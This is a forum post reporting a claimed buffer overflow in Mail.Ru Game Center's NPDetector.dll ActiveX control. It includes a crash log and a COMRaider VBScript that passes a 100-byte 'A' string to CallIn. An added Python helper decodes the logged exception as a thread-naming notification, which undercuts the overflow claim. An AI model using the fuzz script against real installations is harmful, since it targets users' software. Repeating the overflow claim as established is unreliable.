uniksoft
10.03.2014, 09:32
C:\DOCUME~1\9335~1\LOCALS~1\APPLIC~1\Mail.Ru\GAMEC E~1\NPDETE~1.DLL the overflow already occurs at 100 bytes
for anyone who wants to check
--- added: 4 Jan 2014 at 18:34 ---
logs
Exception Code: 0x406D1388
Disasm: 7C812AEB POP ESI (KERNEL32.dll)
Seh Chain:
--------------------------------------------------
1 B08C2B NPDetector.dll
2 B08C4B NPDetector.dll
3 B126DD NPDetector.dll
4 B10A50 NPDetector.dll
5 B10A9A NPDetector.dll
6 AE5BD4 NPDetector.dll
7 7C839AC0 KERNEL32.dll
Called From Returns To
--------------------------------------------------
KERNEL32.7C812AEB NPDetector.B08C21
NPDetector.B08C21 NPDetector.B12691
NPDetector.B12691 NPDetector.B10A46
NPDetector.B10A46 NPDetector.AE6222
NPDetector.AE6222 KERNEL32.7C80B713
Registers:
--------------------------------------------------
EIP 7C812AEB -> 406D1388
EAX 0196FEB4 -> 406D1388
EBX 0182F48C -> Uni: TICClientThread
ECX 00000000
EDX 0181290C -> Asc: TICClientThread
EDI 0013D9C4 -> 7C91540B
ESI 0196FF50 -> 0181290C
EBP 0196FF04 -> 0196FF54
ESP 0196FEB0 -> 00000000
Block Disassembly:
--------------------------------------------------
7C812ADB LEA EDI,[EBP-3C]
7C812ADE REP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
7C812AE0 POP EDI
7C812AE1 LEA EAX,[EBP-50]
7C812AE4 PUSH EAX
7C812AE5 CALL [7C801510]
7C812AEB POP ESI 00001000
EBP+24 0196FF28 -> 0196FF5C
EBP+28 00B08C2B -> FDC9A0E9
Stack Dump:
--------------------------------------------------
196FEB0 00 00 00 00 88 13 6D 40 00 00 00 00 00 00 00 00 [......m.........]
196FEC0 EB 2A 81 7C 04 00 00 00 00 10 00 00 0C 29 81 01 [................]
196FED0 FF FF FF FF 00 00 00 00 8D 64 AE 00 00 00 00 00 [.........d......]
196FEE0 00 00 00 00 0F 00 00 00 0C 29 81 01 0F 00 00 00 [................]
196FEF0 0F 00 00 00 E3 04 00 00 1C FF 96 01 EC 66 AE 00 [.............f..]
'File Generated by COMRaider v0.0.133
'Wscript.echo typename(target)
'for debugging/custom prolog
targetFile = "C:\DOCUME~1\9335~1\LOCALS~1\APPLIC~1\Mail.Ru\GAMEC E~1\NPDETE~1.DLL"
prototype = "Function CallIn ( ByVal Version As Long , ByVal DataType As String , ByVal Data As String ) As Long"
memberName = "CallIn"
progid = "NPDetector.GameCenterDetector"
argCount = 3
arg1=1
arg2="defaultV"
arg3=String(100, "A")
target.CallIn arg1 ,arg2 ,arg3
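
An added example (not part of the original post and not COMRaider output): a triage helper that decodes the 32-bit EXCEPTION_RECORD visible in the stack dump above. Exception code 0x406D1388 is the value raised by Microsoft's debugger thread-naming convention (MS_VC_EXCEPTION), so the script checks whether the record's parameters form a THREADNAME_INFO before the log entry is filed as a memory-corruption crash. The function names are hypothetical; the dump rows are copied from the log with the ASCII column dropped.

```python
import struct

# First three "Stack Dump" rows from the log above (ASCII column dropped).
STACK_DUMP = """\
196FEB0 00 00 00 00 88 13 6D 40 00 00 00 00 00 00 00 00
196FEC0 EB 2A 81 7C 04 00 00 00 00 10 00 00 0C 29 81 01
196FED0 FF FF FF FF 00 00 00 00 8D 64 AE 00 00 00 00 00
"""

MS_VC_EXCEPTION = 0x406D1388   # raised by the documented thread-naming helper
THREADNAME_TYPE = 0x1000       # THREADNAME_INFO.dwType is always 0x1000


def load_dump(text):
    """Return (base_address, bytes) for rows of '<addr> <16 hex bytes>'."""
    rows = [line.split() for line in text.splitlines() if line.strip()]
    base = int(rows[0][0], 16)
    data = bytes(int(b, 16) for row in rows for b in row[1:17])
    return base, data


def parse_exception_record(base, data, record_addr):
    """Decode a 32-bit EXCEPTION_RECORD located at record_addr inside the dump."""
    off = record_addr - base
    code, flags, _nested, address, nparams = struct.unpack_from("<5I", data, off)
    nparams = min(nparams, 15)  # EXCEPTION_MAXIMUM_PARAMETERS
    params = struct.unpack_from(f"<{nparams}I", data, off + 20)
    return {"code": code, "flags": flags, "address": address, "params": list(params)}


def triage(record):
    """Classify the record: thread-naming notification or something to investigate."""
    p = record["params"]
    if record["code"] == MS_VC_EXCEPTION and len(p) >= 3 and p[0] == THREADNAME_TYPE:
        return {"verdict": "thread-name notification",
                "name_ptr": p[1], "thread_id": p[2]}
    return {"verdict": "needs investigation"}


if __name__ == "__main__":
    base, data = load_dump(STACK_DUMP)
    # EAX in the register dump is 0196FEB4 and points at the exception code.
    rec = parse_exception_record(base, data, 0x0196FEB4)
    print(f"code=0x{rec['code']:08X} raised at 0x{rec['address']:08X}")
    print(triage(rec))
```

The decoded name pointer, 0181290C, is the address the register dump annotates as `Asc: TICClientThread`.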